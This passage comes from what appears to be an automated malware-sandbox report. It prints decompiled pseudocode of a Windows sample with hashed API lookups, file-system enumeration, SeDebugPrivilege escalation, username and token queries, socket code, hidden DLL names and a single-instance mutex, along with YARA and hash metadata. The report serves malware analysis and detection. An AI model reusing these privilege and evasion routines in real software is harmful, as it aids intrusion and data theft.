								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                      0x00403d82
                      0x00403d88
                      0x00403d8c
                      0x00403d8d
                      0x00403d90
                      0x00403ea9
                      0x00403ea9
                      0x00403eb9
                      0x00403ebb
                      0x00403ec0
                      0x00403f95
                      0x00403f95
                      0x00000000
                      0x00403f95
                      0x00403ece
                      0x00403edb
                      0x00403edd
                      0x00403ee2
                      0x00403f8e
                      0x00403f8f
                      0x00000000
                      0x00403f94
                      0x00000000
                      0x00403ee8
                      0x00403ef8
                      0x00403f0a
                      0x00403f12
                      0x00403f18
                      0x00403f26
                      0x00403f28
                      0x00403f2d
                      0x00000000
                      0x00000000
                      0x00403f33
                      0x00403f76
                      0x00403f7c
                      0x00000000
                      0x00403f83
                      0x00403f36
                      0x00403f3a
                      0x00000000
                      0x00403f40
                      0x00403f0c
                      0x00403f10
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403f41
                      0x00403f41
                      0x00403f4b
                      0x00403f58
                      0x00403f5c
                      0x00403f88
                      0x00000000
                      0x00403f8d
                      0x00403f60
                      0x00000000
                      0x00403f60
                      0x00403ef8
                      0x00403ee8
                      0x00403da3
                      0x00403da9
                      0x00403ea6
                      0x00403ea8
                      0x00000000
                      0x00403ea8
                      0x00403db7
                      0x00403dc4
                      0x00403dc6
                      0x00403dcb
                      0x00403e9d
                      0x00403e9e
                      0x00403ea4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403dd1
                      0x00403dd1
                      0x00403dd8
                      0x00000000
                      0x00000000
                      0x00403de2
                      0x00403e12
                      0x00403e22
                      0x00403e30
                      0x00403e36
                      0x00403e3f
                      0x00403e44
                      0x00403e47
                      0x00403e4a
                      0x00403e4c
                      0x00000000
                      0x00000000
                      0x00403e63
                      0x00403e65
                      0x00403e6a
                      0x00403e6f
                      0x00403f64
                      0x00403f6a
                      0x00000000
                      0x00403f71
                      0x00000000
                      0x00403e6f
                      0x00403e26
                      0x00403e27
                      0x00403e2e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403e2e
                      0x00403dea
                      0x00403df9
                      0x00000000
                      0x00000000
                      0x00403e01
                      0x00403e10
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403e75
                      0x00403e7f
                      0x00403e8c
                      0x00403e8e
                      0x00403e97
                      0x00000000

                      APIs
                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: FileFind$FirstNext
                      • String ID: %s\%s$%s\*$Program Files$Windows
                      • API String ID: 1690352074-2009209621
                      • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                      • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                      • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                      • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                      Download Yara Rule
                      C-Code - Quality: 78%
                      			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                      0x00406512
                      0x00406514
                      0x00406522
                      0x00406524
                      0x00406530
                      0x00406534
                      0x0040653f
                      0x0040654e
                      0x00406552
                      0x0040655a
                      0x0040655f
                      0x0040656d
                      0x00406570
                      0x00406573
                      0x0040657a
                      0x00406589
                      0x0040658d
                      0x00406590
                      0x00406594
                      0x00000000
                      0x0040659a
                      0x004065a1

                      APIs
                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                      • String ID: SeDebugPrivilege
                      • API String ID: 3615134276-2896544425
                      • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                      • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                      • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                      • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                      0x00402b8c
                      0x00402b92
                      0x00402b96
                      0x00402b9e
                      0x00402ba3
                      0x00402baa

                      APIs
                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcess
                      • String ID:
                      • API String ID: 1357844191-0
                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                      0x00406077
                      0x00406082
                      0x00406085

                      APIs
                      • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: NameUser
                      • String ID:
                      • API String ID: 2645101109-0
                      • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                      • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                      • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                      • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                      Download Yara Rule
                      APIs
                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: recv
                      • String ID:
                      • API String ID: 1507349165-0
                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                      Download Yara Rule
                      C-Code - Quality: 75%
                      			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                      0x004061c3
                      0x004061cb
                      0x004061cd
                      0x004061d0
                      0x004061de
                      0x004061e0
                      0x004061e5
                      0x004061e9
                      0x004061eb
                      0x004061ed
                      0x004061f2
                      0x0040622a
                      0x00406230
                      0x00406235
                      0x00406239
                      0x0040623b
                      0x00406244
                      0x00406249
                      0x00406249
                      0x0040624c
                      0x00406253
                      0x00406256
                      0x00406258
                      0x00406261
                      0x00406266
                      0x00406266
                      0x00406270
                      0x00406273
                      0x00406276
                      0x0040627b
                      0x0040627e
                      0x0040628c
                      0x0040628e
                      0x00406290
                      0x00406295
                      0x0040629a
                      0x0040629e
                      0x004062a0
                      0x004062ac
                      0x004062af
                      0x004062b7
                      0x004062b9
                      0x004062c9
                      0x004062e0
                      0x004062e2
                      0x004062e4
                      0x004062f3
                      0x004062f3
                      0x004062e4
                      0x004062f8
                      0x004062fd
                      0x004062a0
                      0x004062fe
                      0x00406302
                      0x00406307
                      0x0040630c
                      0x0040630d
                      0x0040630f
                      0x00406312
                      0x00406317
                      0x00406318
                      0x0040631c
                      0x0040631e
                      0x00406321
                      0x00406326
                      0x00000000
                      0x00406327
                      0x004061f4
                      0x004061ff
                      0x00406208
                      0x00406218
                      0x0040621d
                      0x00406224
                      0x00406226
                      0x00406228
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406228
                      0x00406201
                      0x00000000

                      APIs
                      • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                      • _wmemset.LIBCMT ref: 00406244
                      • _wmemset.LIBCMT ref: 00406261
                      • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: _wmemset$ErrorInformationLastToken
                      • String ID: IDA$IDA
                      • API String ID: 487585393-2020647798
                      • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                      • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                      Download Yara Rule
                      C-Code - Quality: 37%
                      			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                      0x00404e1d
                      0x00404e26
                      0x00404e2a
                      0x00404e2f
                      0x00404e37
                      0x00404e3a
                      0x00404e45
                      0x00404e4f
                      0x00404e57
                      0x00404e61
                      0x00404e66
                      0x00404e68
                      0x00404e6c
                      0x00404e6e
                      0x00404e7a
                      0x00404e80
                      0x00404e84
                      0x00404e9f
                      0x00404ea7
                      0x00404eab
                      0x00404eb1
                      0x00404eb1
                      0x00404eb6
                      0x00404ebe
                      0x00404ecb
                      0x00000000
                      0x00404ec0
                      0x00404ec1
                      0x00404ec7
                      0x00404ec7
                      0x00404ecd
                      0x00000000
                      0x00404ece
                      0x00404ebe
                      0x00404e87
                      0x00404e90
                      0x00000000
                      0x00404e90
                      0x00000000

                      APIs
                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                      • socket.WS2_32(?,?,?), ref: 00404E7A
                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: freeaddrinfogetaddrinfosocket
                      • String ID:
                      • API String ID: 2479546573-0
                      • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                      • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 74%
                      			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                      0x004040c4
                      0x004040ce
                      0x004040d0
                      0x004040e8
                      0x004040ea
                      0x004040ec
                      0x004040f2
                      0x0040418d
                      0x00404190
                      0x00404184
                      0x00000000
                      0x00404184
                      0x004041a0
                      0x004041a5
                      0x004041a7
                      0x00000000
                      0x00000000
                      0x004041a9
                      0x004041b6
                      0x004041b8
                      0x004041be
                      0x004041cb
                      0x004041d0
                      0x004041d1
                      0x004041d3
                      0x004041d8
                      0x004041dc
                      0x00000000
                      0x004041e2
                      0x00404100
                      0x0040410c
                      0x00404111
                      0x0040417a
                      0x0040417a
                      0x00000000
                      0x0040411b
                      0x0040411b
                      0x00404120
                      0x00404122
                      0x00404122
                      0x0040412c
                      0x0040413a
                      0x0040413c
                      0x00404140
                      0x00000000
                      0x00404142
                      0x0040414a
                      0x00404155
                      0x0040415a
                      0x0040415e
                      0x00404168
                      0x00404174
                      0x00404176
                      0x00404176
                      0x0040417d
                      0x0040417e
                      0x00000000
                      0x00404183
                      0x00404140

                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: File$AllocCreateReadVirtual
                      • String ID: .tmp
                      • API String ID: 3585551309-2986845003
                      • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                      • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                      • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                      • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                      Download Yara Rule
                      C-Code - Quality: 79%
                      			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                      0x0041386f
                      0x0041387e
                      0x00413885
                      0x00413889
                      0x0041388c
                      0x00413890
                      0x00413893
                      0x00413897
                      0x0041389a
                      0x0041389e
                      0x004138a1
                      0x004138a5
                      0x004138a8
                      0x004138ac
                      0x004138af
                      0x004138b2
                      0x004138b5
                      0x004138b8
                      0x004138bb
                      0x004138bc
                      0x004138c4
                      0x004138c8
                      0x004138cb
                      0x004138cf
                      0x004138d2
                      0x004138d6
                      0x004138d7
                      0x004138df
                      0x004138e3
                      0x004138e4
                      0x004138ea
                      0x004138eb
                      0x004138f1
                      0x004138f5
                      0x004138f9
                      0x004138fd
                      0x00413901
                      0x00413905
                      0x00413909
                      0x0041390d
                      0x00413911
                      0x00413915
                      0x00413919
                      0x0041391d
                      0x00413921
                      0x00413925
                      0x00413929
                      0x0041392d
                      0x00413931
                      0x00413935
                      0x00413939
                      0x0041393d
                      0x00413941
                      0x00413950
                      0x00413959
                      0x0041395f
                      0x00413968
                      0x0041396e
                      0x00413973
                      0x00413977
                      0x00413979
                      0x00413980
                      0x00413982
                      0x00413991
                      0x0041399c
                      0x0041399e
                      0x004139a4
                      0x004139a9
                      0x004139ac
                      0x004139b1
                      0x004139b1
                      0x004139b2
                      0x004139b7
                      0x004139bc
                      0x004139c1
                      0x004139c7
                      0x004139cd
                      0x004139cd
                      0x004139db

                      APIs
                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                      • GetLastError.KERNEL32 ref: 0041399E
                      Memory Dump Source
                      • Source File: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Error$CreateLastModeMutex
                      • String ID:
                      • API String ID: 3448925889-0
                      • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                      • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
